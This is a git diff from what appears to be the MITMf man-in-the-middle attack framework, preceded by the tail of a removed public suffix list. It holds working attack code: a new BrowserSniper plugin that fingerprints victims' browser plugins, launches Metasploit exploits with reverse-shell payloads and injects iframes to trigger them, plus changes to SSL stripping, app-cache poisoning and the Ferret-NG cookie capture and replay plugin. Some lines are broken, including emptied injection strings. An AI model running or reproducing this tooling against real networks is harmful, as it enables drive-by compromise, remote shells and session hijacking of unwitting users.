managed indepedently except for private (PVT), charter (CHTR) and -// parochial (PAROCH) schools. Those are delegated dorectly to the -// 5LD operators. -pvt.k12.ma.us -chtr.k12.ma.us -paroch.k12.ma.us - -// uy : http://www.antel.com.uy/ -*.uy - -// uz : http://www.reg.uz/registerr.html -// are there other 2nd level tlds ? -uz -com.uz -co.uz - -// va : http://en.wikipedia.org/wiki/.va -va - -// vc : http://en.wikipedia.org/wiki/.vc -// Submitted by registry 2008-06-13 -vc -com.vc -net.vc -org.vc -gov.vc -mil.vc -edu.vc - -// ve : http://registro.nic.ve/nicve/registro/index.html -*.ve - -// vg : http://en.wikipedia.org/wiki/.vg -vg - -// vi : http://www.nic.vi/newdomainform.htm -// http://www.nic.vi/Domain_Rules/body_domain_rules.html indicates some other -// TLDs are "reserved", such as edu.vi and gov.vi, but doesn't actually say they -// are available for registration (which they do not seem to be). -vi -co.vi -com.vi -k12.vi -net.vi -org.vi - -// vn : https://www.dot.vn/vnnic/vnnic/domainregistration.jsp -vn -com.vn -net.vn -org.vn -edu.vn -gov.vn -int.vn -ac.vn -biz.vn -info.vn -name.vn -pro.vn -health.vn - -// vu : http://en.wikipedia.org/wiki/.vu -// list of 2nd level tlds ? -vu - -// ws : http://en.wikipedia.org/wiki/.ws -// http://samoanic.ws/index.dhtml -ws -com.ws -net.ws -org.ws -gov.ws -edu.ws - -// IDN ccTLDs -// Please sort by ISO 3166 ccTLD, then punicode string -// when submitting patches and follow this format: -// ("" ) : -// [optional sponsoring org] -// - -// xn--mgbaam7a8h ("Emerat" Arabic) : AE -//http://nic.ae/english/arabicdomain/rules.jsp -امارات - -// xn--54b7fta0cc ("Bangla" Bangla) : BD -বাংলা - -// xn--fiqs8s ("China" Chinese-Han-Simplified <.Zhonggou>) : CN -// CNNIC -// http://cnnic.cn/html/Dir/2005/10/11/3218.htm -中国 - -// xn--fiqz9s ("China" Chinese-Han-Traditional <.Zhonggou>) : CN -// CNNIC -// http://cnnic.cn/html/Dir/2005/10/11/3218.htm -中國 - -// xn--lgbbat1ad8j ("Algeria / Al Jazair" Arabic) : DZ -الجزائر - -// xn--wgbh1c ("Egypt" Arabic .masr) : EG -// http://www.dotmasr.eg/ -مصر - -// xn--node ("ge" Georgian (Mkhedruli)) : GE -გე - -// xn--j6w193g ("Hong Kong" Chinese-Han) : HK -// https://www2.hkirc.hk/register/rules.jsp -香港 - -// xn--h2brj9c ("Bharat" Devanagari) : IN -// India -भारत - -// xn--mgbbh1a71e ("Bharat" Arabic) : IN -// India -بھارت - -// xn--fpcrj9c3d ("Bharat" Telugu) : IN -// India -భారత్ - -// xn--gecrj9c ("Bharat" Gujarati) : IN -// India -ભારત - -// xn--s9brj9c ("Bharat" Gurmukhi) : IN -// India -ਭਾਰਤ - -// xn--45brj9c ("Bharat" Bengali) : IN -// India -ভারত - -// xn--xkc2dl3a5ee0h ("India" Tamil) : IN -// India -இந்தியா - -// xn--mgba3a4f16a ("Iran" Persian) : IR -ایران - -// xn--mgba3a4fra ("Iran" Arabic) : IR -ايران - -//xn--mgbayh7gpa ("al-Ordon" Arabic) JO -//National Information Technology Center (NITC) -//Royal Scientific Society, Al-Jubeiha -الاردن - -// xn--3e0b707e ("Republic of Korea" Hangul) : KR -한국 - -// xn--fzc2c9e2c ("Lanka" Sinhalese-Sinhala) : LK -// http://nic.lk -ලංකා - -// xn--xkc2al3hye2a ("Ilangai" Tamil) : LK -// http://nic.lk -இலங்கை - -// xn--mgbc0a9azcg ("Morocco / al-Maghrib" Arabic) : MA -المغرب - -// xn--mgb9awbf ("Oman" Arabic) : OM -عمان - -// xn--ygbi2ammx ("Falasteen" Arabic) : PS -// The Palestinian National Internet Naming Authority (PNINA) -// http://www.pnina.ps -فلسطين - -// xn--90a3ac ("srb" Cyrillic) : RS -срб - -// xn--p1ai ("rf" Russian-Cyrillic) : RU -// http://www.cctld.ru/en/docs/rulesrf.php -рф - -// xn--wgbl6a ("Qatar" Arabic) : QA -// http://www.ict.gov.qa/ -قطر - -// xn--mgberp4a5d4ar ("AlSaudiah" Arabic) : SA -// http://www.nic.net.sa/ -السعودية - -// xn--mgberp4a5d4a87g ("AlSaudiah" Arabic) variant : SA -السعودیة - -// xn--mgbqly7c0a67fbc ("AlSaudiah" Arabic) variant : SA -السعودیۃ - -// xn--mgbqly7cvafr ("AlSaudiah" Arabic) variant : SA -السعوديه - -// xn--ogbpf8fl ("Syria" Arabic) : SY -سورية - -// xn--mgbtf8fl ("Syria" Arabic) variant : SY -سوريا - -// xn--yfro4i67o Singapore ("Singapore" Chinese-Han) : SG -新加坡 - -// xn--clchc0ea0b2g2a9gcd ("Singapore" Tamil) : SG -சிங்கப்பூர் - -// xn--o3cw4h ("Thai" Thai) : TH -// http://www.thnic.co.th -ไทย - -// xn--pgbs0dh ("Tunis") : TN -// http://nic.tn -تونس - -// xn--kpry57d ("Taiwan" Chinese-Han-Traditional) : TW -// http://www.twnic.net/english/dn/dn_07a.htm -台灣 - -// xn--kprw13d ("Taiwan" Chinese-Han-Simplified) : TW -// http://www.twnic.net/english/dn/dn_07a.htm -台湾 - -// xn--nnx388a ("Taiwan") variant : TW -臺灣 - -// xn--j1amh ("ukr" Cyrillic) : UA -укр - -// xn--mgb2ddes ("AlYemen" Arabic) : YE -اليمن - -// xxx : http://icmregistry.com -xxx - -// ye : http://www.y.net.ye/services/domain_name.htm -*.ye - -// yu : http://www.nic.yu/pravilnik-e.html -*.yu - -// za : http://www.zadna.org.za/slds.html -*.za - -// zm : http://en.wikipedia.org/wiki/.zm -*.zm - -// zw : http://en.wikipedia.org/wiki/.zw -*.zw diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index 9fe76cb..d9175a3 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -42,6 +42,10 @@ class ProxyPlugins: in handleResponse, but is still annoying. ''' _instance = None + + plist = [] + mthdDict = {"connectionMade": "clientRequest", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"} + pmthds = {} @staticmethod def getInstance(): @@ -50,13 +54,9 @@ class ProxyPlugins: return ProxyPlugins._instance - def setPlugins(self,plugins): + def setPlugins(self, plugins): '''Set the plugins in use''' - self.plist = [] - - #build a lookup list - #need to clean up in future - self.pmthds = {} + for p in plugins: self.addPlugin(p) @@ -66,17 +66,17 @@ class ProxyPlugins: '''Load a plugin''' self.plist.append(p) mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name)) - for mthd in p.implements: + for mthd,pmthd in self.mthdDict.iteritems(): try: - self.pmthds[mthd].append(getattr(p,mthd)) + self.pmthds[mthd].append(getattr(p,pmthd)) except KeyError: - self.pmthds[mthd] = [getattr(p,mthd)] + self.pmthds[mthd] = [getattr(p,pmthd)] def removePlugin(self,p): '''Unload a plugin''' self.plist.remove(p) mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name)) - for mthd in p.implements: + for mthd,pmthd in self.mthdDict.iteritems(): self.pmthds[mthd].remove(p) def hook(self): @@ -92,9 +92,15 @@ class ProxyPlugins: args[key] = values[key] #prevent self conflict - args['request'] = args['self'] + if (fname == "handleResponse") or (fname == "handleHeader") or (fname == "handleEndHeaders"): + args['request'] = args['self'] + args['response'] = args['self'].client + else: + args['request'] = args['self'] + del args['self'] + mitmf_logger.debug("[ProxyPlugins] hooking {}()".format(fname)) #calls any plugin that has this hook try: for f in self.pmthds[fname]: diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index df60e20..67b6dba 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -16,7 +16,13 @@ # USA # -import urlparse, logging, os, sys, random, re, dns.resolver +import urlparse +import logging +import os +import sys +import random +import re +import dns.resolver from twisted.web.http import Request from twisted.web.http import HTTPChannel @@ -33,7 +39,6 @@ from SSLServerConnection import SSLServerConnection from URLMonitor import URLMonitor from CookieCleaner import CookieCleaner from DnsCache import DnsCache -from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger('mitmf') @@ -52,7 +57,6 @@ class ClientRequest(Request): self.hsts = URLMonitor.getInstance().hsts self.cookieCleaner = CookieCleaner.getInstance() self.dnsCache = DnsCache.getInstance() - self.plugins = ProxyPlugins.getInstance() #self.uniqueId = random.randint(0, 10000) #Use are own DNS server instead of reactor.resolve() @@ -62,9 +66,6 @@ class ClientRequest(Request): def cleanHeaders(self): headers = self.getAllHeaders().copy() - #for k,v in headers.iteritems(): - # mitmf_logger.debug("[ClientRequest] Receiving headers: (%s => %s)" % (k, v)) - if self.hsts: if 'referer' in headers: @@ -92,8 +93,6 @@ class ClientRequest(Request): if 'cache-control' in headers: del headers['cache-control'] - self.plugins.hook() - return headers def getPathFromUri(self): @@ -111,7 +110,7 @@ class ClientRequest(Request): if os.path.exists(scriptPath): return scriptPath - mitmf_logger.warning("Error: Could not find lock.ico") + mitmf_logger.warning("[ClientRequest] Error: Could not find lock.ico") return "lock.ico" def handleHostResolvedSuccess(self, address): diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 4f3cb11..994e106 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -16,14 +16,16 @@ # USA # -import logging, re, string, random, zlib, gzip, StringIO, sys -import plugins - -try: - from user_agents import parse -except: - pass +import logging +import re +import string +import random +import zlib +import gzip +import StringIO +import sys +from user_agents import parse from twisted.web.http import HTTPClient from URLMonitor import URLMonitor from core.sergioproxy.ProxyPlugins import ProxyPlugins @@ -53,6 +55,7 @@ class ServerConnection(HTTPClient): self.postData = postData self.headers = headers self.client = client + self.printPostData = True self.clientInfo = None self.urlMonitor = URLMonitor.getInstance() self.hsts = URLMonitor.getInstance().hsts @@ -78,22 +81,17 @@ class ServerConnection(HTTPClient): mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host'])) mitmf_logger.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri)) - self.plugins.hook() self.sendCommand(self.command, self.uri) def sendHeaders(self): for header, value in self.headers.iteritems(): - mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value)) + mitmf_logger.debug("[ServerConnection] Sending header: ({}: {})".format(header, value)) self.sendHeader(header, value) self.endHeaders() def sendPostData(self): - if 'clientprfl' in self.uri: - self.plugins.hook() - elif 'keylog' in self.uri: - self.plugins.hook() - else: + if self.printPostData is True: #So we can disable printing POST data coming from plugins try: postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging if len(postdata) > 0: @@ -101,8 +99,9 @@ class ServerConnection(HTTPClient): except UnicodeDecodeError and UnicodeEncodeError: mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host'])) pass - - self.transport.write(self.postData) + + self.printPostData = True + self.transport.write(self.postData) def connectionMade(self): mitmf_logger.debug("[ServerConnection] HTTP connection made.") @@ -118,8 +117,6 @@ class ServerConnection(HTTPClient): self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): - mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value)) - if (key.lower() == 'location'): value = self.replaceSecureLinks(value) if self.app: @@ -128,11 +125,11 @@ class ServerConnection(HTTPClient): if (key.lower() == 'content-type'): if (value.find('image') != -1): self.isImageRequest = True - mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...") + mitmf_logger.debug("[ServerConnection] Response is image content, not scanning") if (key.lower() == 'content-encoding'): if (value.find('gzip') != -1): - mitmf_logger.debug("[ServerConnection] Response is compressed...") + mitmf_logger.debug("[ServerConnection] Response is compressed") self.isCompressed = True elif (key.lower()== 'strict-transport-security'): @@ -147,15 +144,19 @@ class ServerConnection(HTTPClient): else: self.client.setHeader(key, value) + def handleEndHeaders(self): + if (self.isImageRequest and self.contentLength != None): + self.client.setHeader("Content-Length", self.contentLength) + + if self.length == 0: + self.shutdown() + self.plugins.hook() - def handleEndHeaders(self): - if (self.isImageRequest and self.contentLength != None): - self.client.setHeader("Content-Length", self.contentLength) + if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG": + for header, value in self.client.headers.iteritems(): + mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value)) - if self.length == 0: - self.shutdown() - def handleResponsePart(self, data): if (self.isImageRequest): self.client.write(data) @@ -175,15 +176,11 @@ class ServerConnection(HTTPClient): if (self.isCompressed): mitmf_logger.debug("[ServerConnection] Decompressing content...") data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read() - - if len(data) < 1500: - mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data:\n{}".format(len(data), data)) - else: - mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) data = self.replaceSecureLinks(data) - res = self.plugins.hook() - data = res['data'] + data = self.plugins.hook()['data'] + + mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data))) if (self.contentLength != None): self.client.setHeader('Content-Length', len(data)) @@ -212,7 +209,7 @@ class ServerConnection(HTTPClient): for match in iterator: url = match.group() - mitmf_logger.debug("[ServerConnection] Found secure reference: " + url) + mitmf_logger.debug("[ServerConnection][HSTS] Found secure reference: " + url) nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url) mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl)) sustitucion[url] = nuevaurl diff --git a/core/utils.py b/core/utils.py index 059cc61..38845f0 100644 --- a/core/utils.py +++ b/core/utils.py @@ -30,51 +30,6 @@ from scapy.all import get_if_addr, get_if_hwaddr mitmf_logger = logging.getLogger('mitmf') -class ImportDir: - #--------------------------------------------------------------------------------------------------- - # http://gitlab.com/aurelien-lourot/importdir - #--------------------------------------------------------------------------------------------------- - - # File name of a module: - __module_file_regexp = "(.+)\.py(c?)$" - - #--------------------------------------------------------------------------------------------------- - # Interface - #--------------------------------------------------------------------------------------------------- - - def do(self, path, env): - """ Imports all modules residing directly in directory "path" into the provided environment - (usually the callers environment). A typical call: - importdir.do("example_dir", globals()) - """ - self.__do(path, env) - - - #--------------------------------------------------------------------------------------------------- - # Implementation - #--------------------------------------------------------------------------------------------------- - - def get_module_names_in_dir(self, path): - """ Returns a set of all module names residing directly in directory "path". - """ - result = set() - - # Looks for all python files in the directory (not recursively) and add their name to result: - for entry in os.listdir(path): - if os.path.isfile(os.path.join(path, entry)): - regexp_result = re.search(self.__module_file_regexp, entry) - if regexp_result: # is a module file name - result.add(regexp_result.groups()[0]) - - return result - - def __do(self, path, env): - """ Implements do(). - """ - sys.path.append(path) # adds provided directory to list we can import from - for module_name in sorted(self.get_module_names_in_dir(path)): # for each found module... - env[module_name] = __import__(module_name) # ... import - class SystemConfig: @staticmethod diff --git a/mitmf.py b/mitmf.py index df3ed01..6820952 100755 --- a/mitmf.py +++ b/mitmf.py @@ -83,7 +83,7 @@ try: sgroup.add_argument("--{}".format(p.optname), action="store_true",help="Load plugin {}".format(p.name)) if p.has_opts: - p.add_options(sgroup) + p.pluginOptions(sgroup) arg_dict[p.optname] = vars(sgroup)['_group_actions'] @@ -101,10 +101,10 @@ args = parser.parse_args() for plugin, options in arg_dict.iteritems(): if vars(args)[plugin] is False: for option in options: - if vars(args)[option.dest] is True: - sys.exit("[-] Called plugin options without invoking --{}".format(plugin)) + if vars(args)[option.dest]: + sys.exit("[-] Called plugin options without invoking the actual plugin (--{})".format(plugin)) -#first check to see if we supplied a valid interface +#check to see if we supplied a valid interface myip = SystemConfig.getIP(args.interface) mymac = SystemConfig.getMAC(args.interface) @@ -181,7 +181,7 @@ from core.dnschef.DNSchef import DNSChef DNSChef.getInstance().start() print "|_ DNSChef v{} online".format(DNSChef.version) -#start the SMB server +#Start the SMB server from core.protocols.smb.SMBserver import SMBserver print "|_ SMBserver online (Impacket {})\n".format(SMBserver.impacket_ver) SMBserver().start() diff --git a/plugins/AppCachePoison.py b/plugins/AppCachePoison.py index 4b787b9..296522f 100644 --- a/plugins/AppCachePoison.py +++ b/plugins/AppCachePoison.py @@ -1,6 +1,6 @@ #!/usr/bin/env python2.7 -# Copyright (c) 2014-2016 Marcello Salvati +# Copyright (c) 2014-2016 Krzysztof Kotowicz, Marcello Salvati # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as @@ -18,8 +18,6 @@ # USA # -# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz - import logging import re import os.path @@ -33,10 +31,9 @@ from core.sslstrip.URLMonitor import URLMonitor mitmf_logger = logging.getLogger("mitmf") class AppCachePlugin(Plugin): - name = "App Cache Poison" + name = "AppCachePoison" optname = "appoison" desc = "Performs App Cache Poisoning attacks" - implements = ["handleResponse"] version = "0.3" has_opts = False @@ -47,7 +44,9 @@ class AppCachePlugin(Plugin): self.urlMonitor.setAppCachePoisoning() - def handleResponse(self, request, data): + def serverResponse(self, response, request, data): + + #This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future self.app_config = self.config['AppCachePoison'] # so we reload the config on each request url = request.client.uri @@ -60,22 +59,22 @@ class AppCachePlugin(Plugin): if "enable_only_in_useragents" in self.app_config: regexp = self.app_config["enable_only_in_useragents"] if regexp and not re.search(regexp,req_headers["user-agent"]): - mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"])) - return {'request': request, 'data': data} + mitmf_logger.info("{} [{}] Tampering disabled in this useragent ({})".format(ip, self.name, req_headers["user-agent"])) + return {'response': response, 'request': request, 'data': data} urls = self.urlMonitor.getRedirectionSet(url) - mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls)) + mitmf_logger.debug("{} [{}] Got redirection set: {}".format(ip,self.name, urls)) (name,s,element,url) = self.getSectionForUrls(urls) if s is False: data = self.tryMassPoison(url, data, headers, req_headers, ip) - return {'request': request, 'data': data} + return {'response': response, 'request': request, 'data': data} - mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name)) + mitmf_logger.info("{} [{}] Found URL {} in section {}".format(ip, self.name, url, name)) p = self.getTemplatePrefix(s) if element == 'tamper': - mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p)) + mitmf_logger.info("{} [{}] Poisoning tamper URL with template {}".format(ip, self.name, p)) if os.path.exists(p + '.replace'): # replace whole content f = open(p + '.replace','r') data = self.decorate(f.read(), s) @@ -92,12 +91,12 @@ class AppCachePlugin(Plugin): data = re.sub(re.compile("",re.IGNORECASE),appendix + "", data) self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip @@ -202,5 +201,3 @@ class AppCachePlugin(Plugin): return (name, section, 'raw',url) return (None, False,'',urls.copy().pop()) - - diff --git a/plugins/BeefAutorun.py b/plugins/BeefAutorun.py index e2ade2e..6104046 100644 --- a/plugins/BeefAutorun.py +++ b/plugins/BeefAutorun.py @@ -27,15 +27,15 @@ from core.beefapi import BeefAPI from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.Inject import Inject +from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger("mitmf") -class BeefAutorun(Inject, Plugin): +class BeefAutorun(Plugin): name = "BeEFAutorun" optname = "beefauto" desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type" tree_output = [] - depends = ["Inject"] version = "0.3" has_opts = False diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py index 1b48b6a..53fc4e1 100644 --- a/plugins/BrowserProfiler.py +++ b/plugins/BrowserProfiler.py @@ -22,23 +22,25 @@ import logging from pprint import pformat from plugins.plugin import Plugin from plugins.Inject import Inject +from core.sergioproxy.ProxyPlugins import ProxyPlugins mitmf_logger = logging.getLogger("mitmf") -class BrowserProfiler(Inject, Plugin): +class BrowserProfiler(Plugin): name = "Browser Profiler" optname = "browserprofiler" desc = "Attempts to enumerate all browser plugins of connected clients" - implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"] - depends = ["Inject"] - version = "0.2" + version = "0.3" has_opts = False def initialize(self, options): - Inject.initialize(self, options) - self.html_payload = self.get_payload() self.dic_output = {} # so other plugins can access the results - + + inject = Inject() + inject.initialize(options) + inject.html_payload = self.get_payload() + ProxyPlugins.getInstance().addPlugin(inject) + def post2dict(self, post): #converts the ajax post to a dic dict = {} for line in post.split('&'): @@ -46,25 +48,29 @@ class BrowserProfiler(Inject, Plugin): dict[t[0]] = t[1] return dict - def sendPostData(self, request): + def clientRequest(self, request): #Handle the plugin output if 'clientprfl' in request.uri: + request.printPostData = False + self.dic_output = self.post2dict(request.postData) self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client if self.dic_output['plugin_list'] > 0: self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',') pretty_output = pformat(self.dic_output) - mitmf_logger.info("{} >> Browser Profiler data:\n{}".format(request.client.getClientIP(), pretty_output)) + mitmf_logger.info("{} [{}] Got data:\n{}".format(request.client.getClientIP(), self.name, pretty_output)) def get_payload(self): payload = """""" - - return payload + plugindetect = open("./core/javascript/plugindetect.js", 'r').read() + return '' diff --git a/plugins/BrowserSniper.py b/plugins/BrowserSniper.py new file mode 100644 index 0000000..0d356a8 --- /dev/null +++ b/plugins/BrowserSniper.py @@ -0,0 +1,222 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +import string +import random +import sys +import logging + +from time import sleep +from core.msfrpc import Msfrpc +from core.utils import SystemConfig +from plugins.plugin import Plugin +from plugins.BrowserProfiler import BrowserProfiler + +mitmf_logger = logging.getLogger("mitmf") + +class BrowserSniper(BrowserProfiler, Plugin): + name = "BrowserSniper" + optname = "browsersniper" + desc = "Performs drive-by attacks on clients with out-of-date browser plugins" + version = "0.4" + has_opts = False + + def initialize(self, options): + self.options = options + self.msfip = SystemConfig.getIP(options.interface) + self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit + + msfcfg = self.config['MITMf']['Metasploit'] + self.rpcip = msfcfg['rpcip'] + self.rpcpass = msfcfg['rpcpass'] + + #Initialize the BrowserProfiler plugin + BrowserProfiler.initialize(self, options) + + try: + self.msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary + self.msf.login('msf', self.rpcpass) + version = self.msf.call('core.version')['version'] + self.tree_info.append("Connected to Metasploit v{}".format(version)) + except Exception: + sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and it's MSGRPC server") + + def startThread(self, options): + self.snipe() + + def onConfigChange(self): + self.initialize(self.options) + + def _genRandURL(self): #generates a random url for our exploits (urls are generated with a / at the beginning) + return "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5)) + + def _getRandPort(self): + return random.randint(1000, 65535) + + def _setupExploit(self, exploit, msfport): + + rand_url = self._genRandURL() + rand_port = self._getRandPort() + #generate the command string to send to the virtual console + #new line character very important as it simulates a user pressing enter + cmd = "use exploit/{}\n".format(exploit) + cmd += "set SRVPORT {}\n".format(msfport) + cmd += "set URIPATH {}\n".format(rand_url) + cmd += "set PAYLOAD generic/shell_reverse_tcp\n" + cmd += "set LHOST {}\n".format(self.msfip) + cmd += "set LPORT {}\n".format(rand_port) + cmd += "set ExitOnSession False\n" + cmd += "exploit -j\n" + + #Create a virtual console + console_id = self.msf.call('console.create')['id'] + + #write the cmd to the newly created console + self.msf.call('console.write', [console_id, cmd]) + + return (rand_url, rand_port) + + def _compat_system(self, os_config, brw_config): + os = self.output['useragent'][0].lower() + browser = self.output['useragent'][1].lower() + + if (os_config == 'any') and (brw_config == 'any'): + return True + + if (os_config == 'any') and (brw_config in browser): + return True + + if (os_config in os) and (brw_config == 'any'): + return True + + if (os_config in os) and (brw_config in browser): + return True + + return False + + def getExploits(self): + exploits = list() + vic_ip = self.output['ip'] + + #First get the client's info + java = None + if (self.output['java_installed'] == '1') and (self.output['java_version'] != 'null'): + java = self.output['java_version'] + + flash = None + if (self.output['flash_installed'] == '1') and (self.output['flash_version'] != 'null'): + flash = self.output['flash_version'] + + mitmf_logger.debug("{} [BrowserSniper] Java installed: {} | Flash installed: {}".format(vic_ip, java, flash)) + + for exploit, details in self.config['BrowserSniper'].iteritems(): + + if self._compat_system(details['OS'].lower(), details['Browser'].lower()): + + if details['Type'].lower() == 'browservuln': + exploits.append(exploit) + + elif details['Type'].lower() == 'pluginvuln': + + if details['Plugin'].lower() == 'java': + if (java is not None) and (java in details['PluginVersions']): + exploits.append(exploit) + + elif details['Plugin'].lower() == 'flash': + + if (flash is not None) and (java in details['PluginVersions']): + exploits.append(exploit) + + mitmf_logger.debug("{} [BrowserSniper] Compatible exploits: {}".format(vic_ip, exploits)) + return exploits + + def injectAndPoll(self, ip, inject_payload): #here we inject an iframe to trigger the exploit and check for resulting sessions + + #inject iframe + mitmf_logger.info("{} [BrowserSniper] Now injecting iframe to trigger exploits".format(ip)) + self.html_payload = inject_payload #temporarily changes the code that the Browserprofiler plugin injects + + #The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds + #Will also make sure the shell actually came from the box that we targeted + #probably a much cleaner way of doing this :/ + mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip)) + exit_loop = False + poll_n = 1 + while poll_n <= 30: + + if exit_loop is True: + break + + sessions = self.msf.call('session.list') + if sessions: + for k, v in sessions.iteritems(): + if ip in sessions[k]['tunnel_peer']: + mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip)) + self.sploited_ips.append(ip) + self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped + exit_loop = True + break + + poll_n += 1 + sleep(2) + + if exit_loop is False: #We didn't get a shell :( + mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip)) + + self.html_payload = self.get_payload() # restart the BrowserProfiler plugin + + def snipe(self): + while True: + if self.output: + vic_ip = self.output['ip'] + msfport = self.config['MITMf']['Metasploit']['msfport'] + exploits = self.getExploits() + + if not exploits: + if vic_ip not in self.sploited_ips: + mitmf_logger.info('{} [BrowserSniper] Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip)) + self.sploited_ips.append(vic_ip) + self.black_ips = self.sploited_ips + + elif exploits and (vic_ip not in self.sploited_ips): + mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits))) + + inject_payload = '' + + for exploit in exploits: + + jobs = self.msf.call('job.list') #get running jobs + if jobs: + for pid, name in jobs.iteritems(): + info = self.msf.call('job.info', [pid]) + if (exploit in info['name']): + mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit)) + url = info['uripath'] #get the url assigned to the exploit + inject_payload += "".format(self.msfip, msfport, url) + else: + url, port = self._setupExploit(exploit, msfport) + inject_payload += "".format(self.msfip, port, url) + else: + url, port = self._setupExploit(exploit, msfport) + inject_payload += "".format(self.msfip, port, url) + + self.injectAndPoll(vic_ip, inject_payload) + + sleep(1) diff --git a/plugins/FerretNG.py b/plugins/FerretNG.py index 9512e62..612dcbf 100644 --- a/plugins/FerretNG.py +++ b/plugins/FerretNG.py @@ -20,20 +20,20 @@ import logging +from datetime import datetime from plugins.plugin import Plugin from twisted.internet import reactor from twisted.web import http from twisted.internet import reactor -from core.ferretNG.FerretProxy import FerretProxy -from core.ferretNG.URLMonitor import URLMonitor +from core.ferretng.FerretProxy import FerretProxy +from core.ferretng.URLMonitor import URLMonitor mitmf_logger = logging.getLogger("mitmf") class FerretNG(Plugin): name = "Ferret-NG" - optname = "ferret" + optname = "ferretng" desc = "Captures cookies and starts a proxy that will feed them to connected clients" - tree_output = list() version = "0.1" has_opts = True @@ -42,14 +42,16 @@ class FerretNG(Plugin): self.options = options self.ferret_port = 10010 or options.ferret_port - self.tree_output.append("Listening on port {}".format(self.ferret_port)) + self.tree_info.append("Listening on port {}".format(self.ferret_port)) def clientRequest(self, request): if 'cookie' in request.headers: host = request.headers['host'] cookie = request.headers['cookie'] - mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(request.client.getClientIP(), host, cookie)) - URLMonitor.getInstance().cookies[host] = cookie + client = request.client.getClientIP() + if host not in URLMonitor.getInstance().cookies: + mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie)) + URLMonitor.getInstance().cookies[client] = {'host': host, 'cookie': cookie} def pluginReactor(self, StrippingProxy): FerretFactory = http.HTTPFactory(timeout=10) @@ -57,4 +59,11 @@ class FerretNG(Plugin): reactor.listenTCP(self.ferret_port, FerretFactory) def pluginOptions(self, options): - options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG on (default 10010)') + options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG proxy on (default 10010)') + options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from log file') + + def finish(self): + mitmf_logger.info("[Ferret-NG] Writing cookies to log file") + with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s"))) as cookie_file: + cookie_file.write(URLMonitor.getInstance().cookies) + 